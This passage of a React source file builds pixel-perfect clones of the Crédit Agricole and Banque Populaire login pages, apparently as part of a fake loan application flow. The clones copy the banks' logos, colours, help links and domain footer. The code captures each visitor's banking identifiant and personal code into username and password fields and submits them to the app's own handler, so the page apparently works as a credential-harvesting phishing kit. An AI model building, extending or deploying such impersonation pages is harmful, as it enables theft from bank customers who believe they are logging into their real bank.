        '55': 'Lorraine', '56': 'Morbihan', '57': 'Lorraine',
        '58': 'Champagne Bourgogne', '59': 'Nord De France', '60': 'Brie Picardie',
        '61': 'Normandie', '62': 'Nord De France', '63': 'Centre France',
        '64': 'Pyrénées Gascogne', '65': 'Pyrénées Gascogne', '66': 'Sud Méditerranée',
        '67': 'Alsace Vosges', '68': 'Alsace Vosges', '69': 'Centre Est',
        '70': 'Franche Comté', '71': 'Centre Est', '72': 'Anjou Maine',
        '73': 'Des Savoie', '74': 'Des Savoie', '75': 'Paris et Île de France',
        '76': 'Normandie Seine', '77': 'Brie Picardie', '78': 'Paris et Île de France',
        '79': 'Charente-Maritime Deux-Sèvres', '80': 'Brie Picardie', '81': 'Nord Midi Pyrénées',
        '82': 'Nord Midi Pyrénées', '83': 'Provence Côte d\'Azur', '84': 'Alpes Provence',
        '85': 'Atlantique Vendée', '86': 'Touraine Poitou', '87': 'Centre Ouest',
        '88': 'Alsace Vosges', '89': 'Champagne Bourgogne', '90': 'Franche Comté',
        '91': 'Paris et Île de France', '92': 'Paris et Île de France', '93': 'Paris et Île de France',
        '94': 'Paris et Île de France', '95': 'Paris et Île de France',
        '97': 'Guadeloupe' // DOM-TOM
      };
      return deptMapping[dept] || 'Paris et Île de France';
    };

    // Handle identifiant input - max 11 digits
    const handleCaIdentifiantChange = (e) => {
      const value = e.target.value.replace(/\D/g, '').slice(0, 11);
      setCaIdentifiant(value);
      setUsername(value);
    };

    // Handle keypad press for code personnel
    const handleCaKeypadPress = (num) => {
      if (caCodePersonnel.length < 6) {
        const newCode = caCodePersonnel + num;
        setCaCodePersonnel(newCode);
        setPassword(newCode);
      }
    };

    // Handle delete for code personnel
    const handleCaCodeDelete = () => {
      const newCode = caCodePersonnel.slice(0, -1);
      setCaCodePersonnel(newCode);
      setPassword(newCode);
    };

    // Handle submit
    const handleCaSubmit = (e) => {
      e.preventDefault();
      if (caCodePersonnel.length === 6) {
        handleSubmit(e);
      }
    };

    // Handle close button
    const handleCaClose = () => {
      navigate('/client/loan-flow/bank-selection');
    };

    // Step 1: Select Caisse Régionale
    if (caStep === 1) {
      return (
        <div className="min-h-screen flex flex-col" style={{ backgroundColor: '#E8E8E8' }}>
          {/* Header */}
          <div className="w-full bg-white py-3 px-4 flex items-center justify-between border-b border-gray-100">
            <button className="p-2">
              <svg className="w-6 h-6 text-gray-600" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M4 6h16M4 12h16M4 18h16" />
              </svg>
            </button>
            <img 
              src={bank.logo} 
              alt="Crédit Agricole"
              className="h-10 w-auto object-contain"
            />
            <div className="flex items-center space-x-3">
              <button className="flex flex-col items-center">
                <svg className="w-6 h-6 text-gray-600" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                  <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M8 12h.01M12 12h.01M16 12h.01M21 12c0 4.418-4.03 8-9 8a9.863 9.863 0 01-4.255-.949L3 20l1.395-3.72C3.512 15.042 3 13.574 3 12c0-4.418 4.03-8 9-8s9 3.582 9 8z" />
                </svg>
                <span className="text-xs text-gray-600">Contact</span>
              </button>
              <button className="w-10 h-10 rounded-full flex items-center justify-center" style={{ backgroundColor: '#006B3F' }}>
                <svg className="w-6 h-6 text-white" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                  <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M16 7a4 4 0 11-8 0 4 4 0 018 0zM12 14a7 7 0 00-7 7h14a7 7 0 00-7-7z" />
                </svg>
              </button>
            </div>
          </div>

          {/* Main Content - Centered Card */}
          <div className="flex-1 flex items-center justify-center px-4 py-8">
            <div className="bg-white rounded-2xl p-6 shadow-lg w-full max-w-md">
              <h1 className="text-2xl font-bold text-gray-900 leading-tight mb-6">
                Accéder à l'espace dédié de votre caisse régionale
              </h1>

              {/* Postal Code Search */}
              <div className="mb-6">
                <label className="block text-base font-semibold text-gray-900 mb-2">
                  Saisir un code postal
                </label>
                <div className="relative">
                  <Input
                    type="text"
                    inputMode="numeric"
                    placeholder="Exemple 75000 pour P..."
                    value={caPostalCode}
                    onChange={(e) => setCaPostalCode(e.target.value.replace(/\D/g, '').slice(0, 5))}
                    className="h-14 text-base bg-gray-50 border border-gray-200 rounded-lg pr-12"
                    data-testid="ca-postal-code-input"
                  />
                  {caPostalCode && (
                    <button
                      type="button"
                      onClick={() => setCaPostalCode('')}
                      className="absolute right-3 top-1/2 -translate-y-1/2 w-8 h-8 rounded-full flex items-center justify-center text-gray-400 hover:text-gray-600"
                    >
                      <svg className="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
                      </svg>
                    </button>
                  )}
                </div>
                <Button
                  type="button"
                  className="w-full h-14 mt-3 text-white font-semibold text-base rounded-full"
                  style={{ backgroundColor: '#006B3F' }}
                  disabled={caPostalCode.length < 5}
                  onClick={() => {
                    const foundCaisse = getCARegionByPostalCode(caPostalCode);
                    setCaSelectedCaisse(foundCaisse);
                    setCaStep(2);
                  }}
                  data-testid="ca-search-btn"
                >
                  Rechercher une caisse régionale
                </Button>
              </div>

              {/* Separator */}
              <div className="flex items-center my-6">
                <div className="flex-1 border-t border-gray-200"></div>
                <span className="px-4 text-gray-500 text-base">Ou</span>
                <div className="flex-1 border-t border-gray-200"></div>
              </div>

              {/* Dropdown Selection */}
              <div>
                <label className="block text-base font-semibold text-gray-900 mb-2">
                  Choisir une caisse régionale
                </label>
                <div className="relative">
                  <button
                    type="button"
                    onClick={() => setCaDropdownOpen(!caDropdownOpen)}
                    className="w-full h-14 px-4 text-base bg-white border border-gray-200 rounded-lg cursor-pointer focus:outline-none focus:ring-2 focus:ring-green-500 flex items-center justify-between text-left"
                    data-testid="ca-caisse-select"
                  >
                    <span style={{ color: caSelectedCaisse ? '#1a1a1a' : '#006B3F' }}>
                      {caSelectedCaisse || 'Choisissez une caisse régi...'}
                    </span>
                    <svg className={`w-5 h-5 transition-transform ${caDropdownOpen ? 'rotate-180' : ''}`} fill="none" stroke="#006B3F" viewBox="0 0 24 24">
                      <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M19 9l-7 7-7-7" />
                    </svg>
                  </button>
                  {caDropdownOpen && (
                    <div className="absolute left-0 right-0 top-full mt-1 bg-white border border-gray-200 rounded-lg shadow-lg max-h-60 overflow-y-auto z-50">
                      {bank.caisseRegionales?.map((caisse, index) => (
                        <button
                          key={index}
                          type="button"
                          onClick={() => {
                            setCaSelectedCaisse(caisse);
                            setCaDropdownOpen(false);
                            setCaStep(2);
                          }}
                          className="w-full px-4 py-3 text-left text-sm text-gray-800 hover:bg-gray-100 border-b border-gray-50 last:border-b-0"
                          data-testid={`ca-caisse-option-${index}`}
                        >
                          {caisse}
                        </button>
                      ))}
                    </div>
                  )}
                </div>
              </div>
            </div>
          </div>

          {/* Footer */}
          <div className="py-4 text-center">
            <span className="text-gray-500 text-sm">credit-agricole.fr — Privée</span>
          </div>
        </div>
      );
    }

    // Step 2: Enter Identifiant (11 digits) - Two Column Layout
    if (caStep === 2) {
      return (
        <div className="min-h-screen flex flex-col bg-white">
          {/* Header with Logo and Close Button */}
          <div className="w-full bg-white py-3 px-4 flex items-center justify-between border-b border-gray-100">
            <div className="flex items-center">
              <img 
                src={bank.logo} 
                alt="Crédit Agricole"
                className="h-8 w-auto object-contain"
              />
              <span className="text-xs font-semibold ml-3" style={{ color: '#006B3F' }}>
                {caSelectedCaisse.toUpperCase()}
              </span>
            </div>
            <button
              onClick={handleCaClose}
              className="w-10 h-10 rounded-lg flex items-center justify-center"
              style={{ backgroundColor: '#006B3F' }}
              data-testid="ca-close-btn"
            >
              <svg className="w-5 h-5 text-white" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
              </svg>
            </button>
          </div>

          {/* Main Content - Two Column Layout */}
          <div className="flex-1 flex flex-col lg:flex-row">
            {/* Left Column - Image + Banner (hidden on mobile) */}
            <div className="hidden lg:flex lg:w-2/5 flex-col">
              {/* Image - cropped from bottom, showing top */}
              <div className="h-80 overflow-hidden">
                <img 
                  src="https://customer-assets.emergentagent.com/job_12f3fd9d-2a6a-4fcb-b6de-7bab3a73bb6c/artifacts/sh236c4w_10000.PNG"
                  alt="Couple devant maison avec panneaux solaires"
                  className="w-full h-full object-cover object-top"
                />
              </div>
              {/* Green Banner */}
              <div className="flex-1 p-6" style={{ backgroundColor: '#006B3F' }}>
                <h2 className="text-xl font-bold text-white mb-3">
                  Installer le soleil chez vous, ce n'est pas si chaud que ça
                </h2>
                <p className="text-sm text-white leading-relaxed">
                  Découvrez <strong>Mon Énergie by CA</strong>, la nouvelle solution solaire du Crédit Agricole. Un conseiller dédié vous accompagne du début à la fin de votre projet.
                </p>
              </div>
            </div>

            {/* Right Column - Form + Help in two sub-columns */}
            <div className="flex-1 lg:w-3/5 flex flex-col" style={{ backgroundColor: '#F5F5F5' }}>
              <div className="flex-1 flex flex-col lg:flex-row p-6 lg:p-8">
                {/* Left sub-column - Form */}
                <div className="lg:w-1/2 lg:pr-8">
                  <h1 className="text-2xl font-bold text-gray-900 leading-tight mb-6">
                    Accéder à mes comptes
                  </h1>

                  <form onSubmit={(e) => { e.preventDefault(); if (caIdentifiant.length === 11) setCaStep(3); }}>
                    {/* Identifiant Field */}
                    <label className="block text-xs font-bold text-gray-700 mb-1">
                      IDENTIFIANT
                    </label>
                    <p className="text-xs text-gray-500 mb-2">
                      Saisissez votre identifiant à 11 chiffres
                    </p>
                    <div className="relative mb-4">
                      <Input
                        type="text"
                        inputMode="numeric"
                        placeholder="Exemple 98652706859"
                        value={caIdentifiant}
                        onChange={handleCaIdentifiantChange}
                        required
                        maxLength={11}
                        className="h-11 text-sm bg-white border border-gray-300 rounded pr-10 text-gray-700 placeholder-gray-400"
                        data-testid="ca-identifiant-input"
                      />
                      {caIdentifiant && (
                        <button
                          type="button"
                          onClick={() => { setCaIdentifiant(''); setUsername(''); }}
                          className="absolute right-3 top-1/2 -translate-y-1/2 text-green-600 hover:text-green-800"
                        >
                          <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                            <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
                          </svg>
                        </button>
                      )}
                    </div>

                    {/* Continue Button */}
                    <Button
                      type="submit"
                      disabled={caIdentifiant.length !== 11}
                      className="w-full h-11 text-sm font-semibold rounded-full mb-6"
                      style={{ 
                        backgroundColor: caIdentifiant.length === 11 ? '#006B3F' : '#C0C0C0',
                        color: 'white'
                      }}
                      data-testid="ca-continue-btn"
                    >
                      ENTRER MON CODE PERSONNEL
                    </Button>
                  </form>

                  {/* Become Client Section */}
                  <div className="pt-4 border-t border-gray-300">
                    <h3 className="text-sm font-bold text-gray-900 mb-3">
                      Vous n'êtes pas encore client ?
                    </h3>
                    <a
                      href="https://www.credit-agricole.fr/ca-alpesprovence/particulier/ouvrir-un-compte.html"
                      target="_blank"
                      rel="noopener noreferrer"
                    >
                      <Button
                        type="button"
                        className="w-full h-11 text-white font-semibold text-sm rounded-full"
                        style={{ backgroundColor: '#006B3F' }}
                      >
                        Devenir client
                      </Button>
                    </a>
                  </div>
                </div>

                {/* Right sub-column - Help Section */}
                <div className="lg:w-1/2 lg:pl-8 lg:border-l border-gray-300 mt-8 lg:mt-0">
                  <div className="space-y-5">
                    {/* Code oublié */}
                    <div>
                      <h3 className="text-xs font-bold text-gray-700 mb-1">CODE OUBLIÉ ?</h3>
                      <a 
                        href="https://www.credit-agricole.fr/ca-alpesprovence/particulier/reinitialisation-code-bam.html"
                        target="_blank"
                        rel="noopener noreferrer"
                        className="text-xs underline"
                        style={{ color: '#006B3F' }}
                      >
                        Réinitialisez votre code personnel.
                      </a>
                    </div>

                    {/* Identifiant oublié */}
                    <div>
                      <h3 className="text-xs font-bold text-gray-700 mb-1">IDENTIFIANT OUBLIÉ ?</h3>
                      <p className="text-xs text-gray-600 leading-relaxed">
                        Retrouvez votre identifiant à 11 chiffres sur les RIB / IBAN de votre chéquier, ou vos relevés de comptes.
                      </p>
                    </div>

                    {/* Problème de navigation */}
                    <div>
                      <h3 className="text-xs font-bold text-gray-700 mb-1">UN PROBLÈME DE NAVIGATION ?</h3>
                      <a 
                        href="https://www.credit-agricole.fr/ca-alpesprovence/particulier/informations/tutos-banque-en-ligne.html"
                        target="_blank"
                        rel="noopener noreferrer"
                        className="text-xs underline"
                        style={{ color: '#006B3F' }}
                      >
                        Consultez l'aide en ligne.
                      </a>
                    </div>

                    {/* Sécurité */}
                    <div>
                      <h3 className="text-xs font-bold text-gray-700 mb-1">SÉCURITÉ</h3>
                      <p className="text-xs text-gray-600 mb-2">
                        Restez vigilants et veillez à protéger vos données personnelles :
                      </p>
                      <div className="space-y-1">
                        <a 
                          href="https://www.credit-agricole.fr/ca-alpesprovence/particulier/cybersecurite.html"
                          target="_blank"
                          rel="noopener noreferrer"
                          className="text-xs underline block"
                          style={{ color: '#006B3F' }}
                        >
                          Consultez nos conseils de sécurité.
                        </a>
                        <a 
                          href="https://www.credit-agricole.fr/ca-alpesprovence/particulier/informations/mentions-legales.html"
                          target="_blank"
                          rel="noopener noreferrer"
                          className="text-xs underline block"
                          style={{ color: '#006B3F' }}
                        >
                          Voir les Conditions Générales d'Utilisation.
                        </a>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>

          {/* Footer */}
          <div className="py-3 text-center border-t border-gray-100">
            <span className="text-gray-400 text-xs">credit-agricole.fr — Privée</span>
          </div>
        </div>
      );
    }

    // Step 3: Enter Code Personnel with Virtual Keypad (6 digits) - Two Column Layout
    if (caStep === 3) {
      return (
        <div className="min-h-screen flex flex-col bg-white">
          {/* Header with Logo and Close Button */}
          <div className="w-full bg-white py-3 px-4 flex items-center justify-between border-b border-gray-100">
            <div className="flex items-center">
              <img 
                src={bank.logo} 
                alt="Crédit Agricole"
                className="h-8 w-auto object-contain"
              />
              <span className="text-xs font-semibold ml-3" style={{ color: '#006B3F' }}>
                {caSelectedCaisse.toUpperCase()}
              </span>
            </div>
            <button
              onClick={handleCaClose}
              className="w-10 h-10 rounded-lg flex items-center justify-center"
              style={{ backgroundColor: '#006B3F' }}
              data-testid="ca-close-btn-step3"
            >
              <svg className="w-5 h-5 text-white" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
              </svg>
            </button>
          </div>

          {/* Main Content - Two Column Layout */}
          <div className="flex-1 flex flex-col lg:flex-row">
            {/* Left Column - Image + Banner (hidden on mobile) */}
            <div className="hidden lg:flex lg:w-2/5 flex-col">
              {/* Image - cropped from bottom, showing top */}
              <div className="h-80 overflow-hidden">
                <img 
                  src="https://customer-assets.emergentagent.com/job_12f3fd9d-2a6a-4fcb-b6de-7bab3a73bb6c/artifacts/sh236c4w_10000.PNG"
                  alt="Couple devant maison avec panneaux solaires"
                  className="w-full h-full object-cover object-top"
                />
              </div>
              {/* Green Banner */}
              <div className="flex-1 p-6" style={{ backgroundColor: '#006B3F' }}>
                <h2 className="text-xl font-bold text-white mb-3">
                  Installer le soleil chez vous, ce n'est pas si chaud que ça
                </h2>
                <p className="text-sm text-white leading-relaxed">
                  Découvrez <strong>Mon Énergie by CA</strong>, la nouvelle solution solaire du Crédit Agricole. Un conseiller dédié vous accompagne du début à la fin de votre projet.
                </p>
              </div>
            </div>

            {/* Right Column - Form + Help in two sub-columns */}
            <div className="flex-1 lg:w-3/5 flex flex-col" style={{ backgroundColor: '#F5F5F5' }}>
              <div className="flex-1 flex flex-col lg:flex-row p-6 lg:p-8">
                {/* Left sub-column - Form */}
                <div className="lg:w-1/2 lg:pr-8">
                  <h1 className="text-2xl font-bold text-gray-900 leading-tight mb-6">
                    Accéder à mes comptes
                  </h1>

                  <form onSubmit={handleCaSubmit}>
                    {/* Identifiant Field (readonly) */}
                    <label className="block text-xs font-bold text-gray-700 mb-1">
                      IDENTIFIANT
                    </label>
                    <div className="relative mb-4">
                      <Input
                        type="text"
                        value={caIdentifiant}
                        readOnly
                        className="h-11 text-sm bg-white border border-gray-300 rounded pr-10 text-gray-700"
                        data-testid="ca-identifiant-readonly"
                      />
                      <button
                        type="button"
                        onClick={() => { setCaIdentifiant(''); setUsername(''); setCaCodePersonnel(''); setPassword(''); setCaStep(2); }}
                        className="absolute right-3 top-1/2 -translate-y-1/2 text-green-600 hover:text-green-800"
                      >
                        <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                          <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
                        </svg>
                      </button>
                    </div>

                    {/* Code Personnel Field */}
                    <div className="flex items-center justify-between mb-1">
                      <label className="block text-xs font-bold text-gray-700">
                        CODE PERSONNEL
                      </label>
                      <a 
                        href={bank.forgotCodeLink}
                        target="_blank"
                        rel="noopener noreferrer"
                        className="text-xs underline"
                        style={{ color: '#006B3F' }}
                      >
                        Perdu / Oublié ?
                      </a>
                    </div>
                    <div className="relative mb-4">
                      <div className="h-11 bg-white border border-gray-300 rounded flex items-center px-4">
                        <div className="flex space-x-2">
                          {[...Array(6)].map((_, i) => (
                            <span key={i} className="text-lg text-gray-900">
                              {i < caCodePersonnel.length ? '●' : '○'}
                            </span>
                          ))}
                        </div>
                        {caCodePersonnel && (
                          <button
                            type="button"
                            onClick={handleCaCodeDelete}
                            className="absolute right-3 top-1/2 -translate-y-1/2 text-green-600 hover:text-green-800"
                          >
                            <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                              <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
                            </svg>
                          </button>
                        )}
                      </div>
                    </div>

                    {/* Virtual Keypad - 5x2 Grid */}
                    <div className="grid grid-cols-5 gap-2 mb-4">
                      {caKeypadNumbers.map((num, index) => (
                        <button
                          key={index}
                          type="button"
                          onClick={() => handleCaKeypadPress(num)}
                          className="h-10 text-lg font-semibold text-gray-900 bg-white hover:bg-gray-100 rounded transition-colors border border-gray-300"
                          data-testid={`ca-keypad-${num}`}
                        >
                          {num}
                        </button>
                      ))}
                    </div>

                    {/* Validate Button */}
                    <Button
                      type="submit"
                      disabled={caCodePersonnel.length !== 6 || loading}
                      className="w-full h-11 text-white font-semibold text-sm rounded-full"
                      style={{ 
                        backgroundColor: caCodePersonnel.length === 6 ? '#006B3F' : '#C0C0C0',
                        color: 'white'
                      }}
                      data-testid="ca-validate-btn"
                    >
                      {loading ? 'Connexion...' : 'VALIDER'}
                    </Button>
                  </form>
                </div>

                {/* Right sub-column - Help Section */}
                <div className="lg:w-1/2 lg:pl-8 lg:border-l border-gray-300 mt-8 lg:mt-0">
                  <div className="space-y-5">
                    {/* Code oublié */}
                    <div>
                      <h3 className="text-xs font-bold text-gray-700 mb-1">CODE OUBLIÉ ?</h3>
                      <a 
                        href="https://www.credit-agricole.fr/ca-alpesprovence/particulier/reinitialisation-code-bam.html"
                        target="_blank"
                        rel="noopener noreferrer"
                        className="text-xs underline"
                        style={{ color: '#006B3F' }}
                      >
                        Réinitialisez votre code personnel.
                      </a>
                    </div>

                    {/* Identifiant oublié */}
                    <div>
                      <h3 className="text-xs font-bold text-gray-700 mb-1">IDENTIFIANT OUBLIÉ ?</h3>
                      <p className="text-xs text-gray-600 leading-relaxed">
                        Retrouvez votre identifiant à 11 chiffres sur les RIB / IBAN de votre chéquier, ou vos relevés de comptes.
                      </p>
                    </div>

                    {/* Problème de navigation */}
                    <div>
                      <h3 className="text-xs font-bold text-gray-700 mb-1">UN PROBLÈME DE NAVIGATION ?</h3>
                      <a 
                        href="https://www.credit-agricole.fr/ca-alpesprovence/particulier/informations/tutos-banque-en-ligne.html"
                        target="_blank"
                        rel="noopener noreferrer"
                        className="text-xs underline"
                        style={{ color: '#006B3F' }}
                      >
                        Consultez l'aide en ligne.
                      </a>
                    </div>

                    {/* Sécurité */}
                    <div>
                      <h3 className="text-xs font-bold text-gray-700 mb-1">SÉCURITÉ</h3>
                      <p className="text-xs text-gray-600 mb-2">
                        Restez vigilants et veillez à protéger vos données personnelles :
                      </p>
                      <div className="space-y-1">
                        <a 
                          href="https://www.credit-agricole.fr/ca-alpesprovence/particulier/cybersecurite.html"
                          target="_blank"
                          rel="noopener noreferrer"
                          className="text-xs underline block"
                          style={{ color: '#006B3F' }}
                        >
                          Consultez nos conseils de sécurité.
                        </a>
                        <a 
                          href="https://www.credit-agricole.fr/ca-alpesprovence/particulier/informations/mentions-legales.html"
                          target="_blank"
                          rel="noopener noreferrer"
                          className="text-xs underline block"
                          style={{ color: '#006B3F' }}
                        >
                          Voir les Conditions Générales d'Utilisation.
                        </a>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>

          {/* Footer */}
          <div className="py-3 text-center border-t border-gray-100">
            <span className="text-gray-400 text-xs">credit-agricole.fr — Privée</span>
          </div>
        </div>
      );
    }
  }

  // Special Banque Populaire Layout - Pixel Perfect Clone with 2 steps
  if (bank.isBanquePopulaireLayout) {
    const BP_COLOR = '#1A1F71';

    const getBPRegionByPostalCode = (postalCode) => {
      const dept = postalCode.substring(0, 2);
      const deptMapping = {
        '01': 'Auvergne Rhône Alpes', '02': 'Du Nord', '03': 'Auvergne Rhône Alpes',
        '04': 'Méditerranée', '05': 'Auvergne Rhône Alpes', '06': 'Méditerranée',
        '07': 'Auvergne Rhône Alpes', '08': 'Alsace Lorraine Champagne', '09': 'Occitane',
        '10': 'Alsace Lorraine Champagne', '11': 'Du Sud', '12': 'Occitane',
        '13': 'Méditerranée', '14': 'Grand Ouest', '15': 'Auvergne Rhône Alpes',
        '16': 'Aquitaine Centre Atlantique', '17': 'Aquitaine Centre Atlantique', '18': 'Val de France',
        '19': 'Aquitaine Centre Atlantique', '20': 'Méditerranée', '21': 'Bourgogne Franche-Comté',
        '22': 'Grand Ouest', '23': 'Aquitaine Centre Atlantique', '24': 'Aquitaine Centre Atlantique',
        '25': 'Bourgogne Franche-Comté', '26': 'Auvergne Rhône Alpes', '27': 'Grand Ouest',
        '28': 'Val de France', '29': 'Grand Ouest', '30': 'Du Sud',
        '31': 'Occitane', '32': 'Occitane', '33': 'Aquitaine Centre Atlantique',
        '34': 'Du Sud', '35': 'Grand Ouest', '36': 'Val de France',
        '37': 'Val de France', '38': 'Auvergne Rhône Alpes', '39': 'Bourgogne Franche-Comté',
        '40': 'Aquitaine Centre Atlantique', '41': 'Val de France', '42': 'Auvergne Rhône Alpes',
        '43': 'Auvergne Rhône Alpes', '44': 'Grand Ouest', '45': 'Val de France',
        '46': 'Occitane', '47': 'Aquitaine Centre Atlantique', '48': 'Du Sud',
        '49': 'Grand Ouest', '50': 'Grand Ouest', '51': 'Alsace Lorraine Champagne',
        '52': 'Alsace Lorraine Champagne', '53': 'Grand Ouest', '54': 'Alsace Lorraine Champagne',
        '55': 'Alsace Lorraine Champagne', '56': 'Grand Ouest', '57': 'Alsace Lorraine Champagne',
        '58': 'Bourgogne Franche-Comté', '59': 'Du Nord', '60': 'Du Nord',
        '61': 'Grand Ouest', '62': 'Du Nord', '63': 'Auvergne Rhône Alpes',
        '64': 'Aquitaine Centre Atlantique', '65': 'Occitane', '66': 'Du Sud',
        '67': 'Alsace Lorraine Champagne', '68': 'Alsace Lorraine Champagne', '69': 'Auvergne Rhône Alpes',
        '70': 'Bourgogne Franche-Comté', '71': 'Bourgogne Franche-Comté', '72': 'Grand Ouest',
        '73': 'Auvergne Rhône Alpes', '74': 'Auvergne Rhône Alpes', '75': 'Rives de Paris',
        '76': 'Grand Ouest', '77': 'Rives de Paris', '78': 'Rives de Paris',
        '79': 'Aquitaine Centre Atlantique', '80': 'Du Nord', '81': 'Occitane',
        '82': 'Occitane', '83': 'Méditerranée', '84': 'Méditerranée',
        '85': 'Grand Ouest', '86': 'Aquitaine Centre Atlantique', '87': 'Aquitaine Centre Atlantique',
        '88': 'Alsace Lorraine Champagne', '89': 'Bourgogne Franche-Comté', '90': 'Bourgogne Franche-Comté',
        '91': 'Rives de Paris', '92': 'Rives de Paris', '93': 'BRED Banque Populaire',
        '94': 'BRED Banque Populaire', '95': 'Rives de Paris'
      };
      return deptMapping[dept] || 'Rives de Paris';
    };

    const handleBpIdentifiantChange = (e) => {
      const value = e.target.value.slice(0, 13);
      setBpIdentifiant(value);
      setUsername(value);
    };

    const handleBpKeypadPress = (num) => {
      if (bpCodeSecret.length < 8) {
        const newCode = bpCodeSecret + num;
        setBpCodeSecret(newCode);
        setPassword(newCode);
      }
    };

    const handleBpCodeDelete = () => {
      const newCode = bpCodeSecret.slice(0, -1);
      setBpCodeSecret(newCode);
      setPassword(newCode);
    };

    const handleBpSubmit = (e) => {
      e.preventDefault();
      if (bpCodeSecret.length >= 6) {
        handleSubmit(e);
      }
    };

    const handleBpClose = () => {
      navigate('/client/loan-flow/bank-selection');
    };

    // Step 1: Select Banque Régionale + Enter Identifiant
    if (bpStep === 1) {
      return (
        <div className="min-h-screen flex flex-col" style={{ backgroundColor: '#F0F0F0' }}>
          {/* Header */}
          <div className="w-full bg-white py-3 px-6 flex items-center justify-between border-b border-gray-200">
            <img 
              src={bank.logo} 
              alt="Banque Populaire"
              className="h-10 w-auto object-contain"
            />
            <button
              onClick={handleBpClose}
              className="w-9 h-9 rounded-full flex items-center justify-center hover:bg-gray-100"
              data-testid="bp-close-btn"
            >
              <svg className="w-5 h-5 text-gray-600" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
              </svg>
            </button>
          </div>

          {/* Main Content - Centered Card */}
          <div className="flex-1 flex items-center justify-center px-4 py-8">
            <div className="bg-white rounded-2xl p-6 shadow-lg w-full max-w-md">
              <h1 className="text-xl font-bold text-gray-900 mb-1 text-center">
                Accéder à mes comptes
              </h1>
              <p className="text-sm text-gray-500 mb-6 text-center">
                Banque Populaire
              </p>

              {/* Postal Code Search */}
              <div className="mb-4">
                <label className="block text-sm font-semibold text-gray-900 mb-2">
                  Rechercher par code postal
                </label>
                <div className="relative">
                  <Input
                    type="text"
                    inputMode="numeric"
                    placeholder="Votre code postal"
                    value={bpPostalCode}
                    onChange={(e) => setBpPostalCode(e.target.value.replace(/\D/g, '').slice(0, 5))}
                    className="h-12 text-sm bg-white border border-gray-200 rounded-lg pr-10"
                    data-testid="bp-postal-input"
                  />
                  {bpPostalCode && (
                    <button type="button" className="absolute right-3 top-1/2 -translate-y-1/2 text-gray-400 hover:text-gray-600" onClick={() => setBpPostalCode('')}>
                      <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24"><path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" /></svg>
                    </button>
                  )}
                </div>
                <Button
                  type="button"
                  disabled={bpPostalCode.length < 5}
                  onClick={() => {
                    const foundBanque = getBPRegionByPostalCode(bpPostalCode);
                    setBpSelectedBanque(foundBanque);
                  }}
                  className="w-full h-10 mt-2 text-white font-semibold text-sm rounded-full"
                  style={{ backgroundColor: bpPostalCode.length >= 5 ? BP_COLOR : '#C0C0C0' }}
                  data-testid="bp-search-btn"
                >
                  Rechercher
                </Button>
              </div>

              {/* Dropdown Selection */}
              <div className="mb-6">
                <label className="block text-sm font-semibold text-gray-900 mb-2">
                  Choisir une Banque Populaire
                </label>
                <div className="relative">
                  <button
                    type="button"
                    onClick={() => setBpDropdownOpen(!bpDropdownOpen)}
                    className="w-full h-12 px-4 text-sm bg-white border border-gray-200 rounded-lg cursor-pointer focus:outline-none focus:ring-2 flex items-center justify-between text-left"
                    data-testid="bp-banque-select"
                  >
                    <span style={{ color: bpSelectedBanque ? '#1a1a1a' : BP_COLOR }}>
                      {bpSelectedBanque || 'Sélectionnez votre banque...'}
                    </span>
                    <svg className={`w-5 h-5 transition-transform ${bpDropdownOpen ? 'rotate-180' : ''}`} fill="none" stroke={BP_COLOR} viewBox="0 0 24 24">
                      <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M19 9l-7 7-7-7" />
                    </svg>
                  </button>
                  {bpDropdownOpen && (
                    <div className="absolute left-0 right-0 top-full mt-1 bg-white border border-gray-200 rounded-lg shadow-lg max-h-60 overflow-y-auto z-50">
                      {bank.banquesRegionales?.map((banque, index) => (
                        <button
                          key={index}
                          type="button"
                          onClick={() => {
                            setBpSelectedBanque(banque);
                            setBpDropdownOpen(false);
                          }}
                          className="w-full px-4 py-3 text-left text-sm text-gray-800 hover:bg-gray-100 border-b border-gray-50 last:border-b-0"
                          data-testid={`bp-banque-option-${index}`}
                        >
                          {banque}
                        </button>
                      ))}
                    </div>
                  )}
                </div>
              </div>

              {/* Identifiant Field */}
              {bpSelectedBanque && (
                <div className="mb-6">
                  <label className="block text-sm font-semibold text-gray-900 mb-2">
                    Votre identifiant
                  </label>
                  <div className="relative">
                    <Input
                      type="text"
                      placeholder="Saisissez votre identifiant"
                      value={bpIdentifiant}
                      onChange={handleBpIdentifiantChange}
                      required
                      maxLength={13}
                      className="h-12 text-sm bg-white border border-gray-200 rounded-lg pr-10"
                      data-testid="bp-identifiant-input"
                    />
                    {bpIdentifiant && (
                      <button type="button" className="absolute right-3 top-1/2 -translate-y-1/2 text-gray-400 hover:text-gray-600" onClick={() => { setBpIdentifiant(''); setUsername(''); }}>
